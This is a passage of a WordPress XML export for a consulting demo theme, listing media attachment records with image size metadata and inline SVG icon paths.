		<path class="st0" d="M58.8,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1C64.6,19.9,64,20,63.3,20s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C58.9,16.6,58.8,16,58.8,15.3z M63.3,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C62,18,62.6,18.2,63.3,18.2z"></path>
		<path class="st0" d="M69.6,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C69.7,16.6,69.6,16,69.6,15.3z M74.2,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C72.8,18,73.4,18.2,74.2,18.2z"></path>
		<path class="st0" d="M80,18.8l1-1.4c0.6,0.4,1.1,0.6,1.5,0.8c0.4,0.2,0.9,0.2,1.3,0.2c0.5,0,1-0.1,1.3-0.3s0.5-0.5,0.5-0.9    c0-0.3-0.1-0.5-0.3-0.7s-0.5-0.3-0.9-0.4l-1.6-0.3c-0.9-0.2-1.5-0.4-2-0.9c-0.4-0.4-0.7-1-0.7-1.6c0-0.8,0.3-1.5,1-2    c0.6-0.5,1.5-0.8,2.5-0.8c0.6,0,1.2,0.1,1.8,0.3c0.6,0.2,1.2,0.4,1.7,0.8l-1,1.3c-0.5-0.3-0.9-0.5-1.4-0.7    c-0.4-0.1-0.9-0.2-1.3-0.2c-0.5,0-0.8,0.1-1.1,0.3c-0.3,0.2-0.4,0.4-0.4,0.8c0,0.3,0.1,0.5,0.3,0.6c0.2,0.1,0.5,0.3,1,0.3l1.6,0.3    c0.9,0.2,1.6,0.5,2,0.9c0.4,0.4,0.7,1,0.7,1.6c0,0.4-0.1,0.8-0.3,1.2c-0.2,0.4-0.4,0.7-0.8,0.9s-0.7,0.5-1.2,0.6    c-0.5,0.1-0.9,0.2-1.4,0.2c-0.8,0-1.5-0.1-2.2-0.3S80.5,19.2,80,18.8z"></path>
		<path class="st0" d="M90.4,17.4v-5h-1.8v-1.6h1.8V8.3l2-0.4v2.9h2.5v1.6h-2.5V17c0,0.4,0.1,0.8,0.3,0.9c0.2,0.2,0.5,0.3,1,0.3    c0.2,0,0.4,0,0.6,0c0.2,0,0.4-0.1,0.7-0.2v1.7c-0.3,0.1-0.6,0.1-0.9,0.2c-0.3,0-0.6,0.1-0.9,0.1c-0.9,0-1.6-0.2-2.1-0.6    S90.4,18.3,90.4,17.4z"></path>
		<path class="st0" d="M104.3,18.7c-0.6,0.5-1.1,0.8-1.7,1c-0.6,0.2-1.2,0.3-1.9,0.3c-0.6,0-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.5-1    s-0.7-0.9-1-1.5s-0.4-1.2-0.4-1.8c0-0.7,0.1-1.3,0.3-1.8c0.2-0.6,0.5-1.1,0.9-1.5s0.9-0.7,1.4-1s1.1-0.4,1.7-0.4    c0.6,0,1.2,0.1,1.7,0.4c0.5,0.2,1,0.6,1.3,1s0.7,0.9,0.9,1.5c0.2,0.6,0.3,1.2,0.3,1.9v0.5h-6.7c0.1,0.7,0.4,1.3,0.9,1.8    s1.1,0.7,1.8,0.7c0.4,0,0.8-0.1,1.2-0.2c0.4-0.1,0.7-0.4,0.9-0.6L104.3,18.7z M100.5,12.3c-0.6,0-1.1,0.2-1.5,0.6    c-0.4,0.4-0.7,1-0.8,1.6h4.7c-0.1-0.7-0.4-1.2-0.8-1.6S101.1,12.3,100.5,12.3z"></path>
		<path class="st0" d="M106.9,19.8v-9h2v2c0.2-0.7,0.6-1.2,1-1.6s0.9-0.5,1.5-0.5c0.2,0,0.3,0,0.4,0.1c0.1,0,0.3,0.1,0.4,0.1v1.8    c-0.2-0.1-0.3-0.1-0.5-0.2s-0.4-0.1-0.6-0.1c-0.5,0-0.9,0.1-1.3,0.4c-0.4,0.3-0.7,0.6-0.9,1.1v5.9H106.9z"></path>
		<path class="st0" d="M115,9c-0.3,0-0.6-0.1-0.9-0.4s-0.4-0.5-0.4-0.9c0-0.3,0.1-0.6,0.4-0.9c0.3-0.3,0.5-0.4,0.9-0.4    c0.3,0,0.6,0.1,0.9,0.4c0.3,0.3,0.4,0.5,0.4,0.9c0,0.3-0.1,0.6-0.4,0.9S115.3,9,115,9z M116,10.8v9h-2v-9H116z"></path>
		<path class="st0" d="M118.1,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C118.2,16.6,118.1,16,118.1,15.3z M122.6,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1    C121.3,18,121.9,18.2,122.6,18.2z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg-404</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/404-2/bg-404/</link>
		<pubDate>Wed, 09 Sep 2020 03:35:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg-404.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>599</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:35:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:35:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg-404]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>597</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg-404.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg-404.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:950;s:4:"file";s:18:"2020/09/bg-404.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:18:"bg-404-300x148.jpg";s:5:"width";i:300;s:6:"height";i:148;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:19:"bg-404-1024x507.jpg";s:5:"width";i:1024;s:6:"height";i:507;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:18:"bg-404-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"bg-404-768x380.jpg";s:5:"width";i:768;s:6:"height";i:380;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:19:"bg-404-1536x760.jpg";s:5:"width";i:1536;s:6:"height";i:760;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:18:"bg-404-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:18:"bg-404-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"bg-404-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:19:"bg-404-1200x950.jpg";s:5:"width";i:1200;s:6:"height";i:950;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>coming-soon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/coming-soon/coming-soon-2/</link>
		<pubDate>Wed, 09 Sep 2020 03:47:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/coming-soon.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>607</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:47:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:47:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>604</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/coming-soon.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/coming-soon.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:1080;s:4:"file";s:23:"2020/09/coming-soon.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"coming-soon-300x169.jpg";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"coming-soon-1024x576.jpg";s:5:"width";i:1024;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"coming-soon-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"coming-soon-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"coming-soon-1536x864.jpg";s:5:"width";i:1536;s:6:"height";i:864;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"coming-soon-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"coming-soon-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"coming-soon-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"coming-soon-1200x1080.jpg";s:5:"width";i:1200;s:6:"height";i:1080;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-elements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/pheader-elements/</link>
		<pubDate>Wed, 09 Sep 2020 06:56:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-elements.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>625</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 06:56:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 06:56:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-elements]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-elements.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-elements.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:28:"2020/09/pheader-elements.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:27:"pheader-elements-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"pheader-elements-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"pheader-elements-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"pheader-elements-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"pheader-elements-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-elements-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-elements-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:29:"pheader-elements-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:29:"pheader-elements-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>interface</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/interface/</link>
		<pubDate>Wed, 09 Sep 2020 07:02:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/interface.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>629</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:02:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:02:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[interface]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/interface.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/interface.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>business-and-finance</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/business-and-finance/</link>
		<pubDate>Wed, 09 Sep 2020 07:06:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/business-and-finance.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>631</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:06:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:06:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-and-finance]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/business-and-finance.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/business-and-finance.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>business-and-finance-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/business-and-finance-1/</link>
		<pubDate>Wed, 09 Sep 2020 07:26:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/business-and-finance-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>637</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:26:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:26:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-and-finance-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/business-and-finance-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/business-and-finance-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
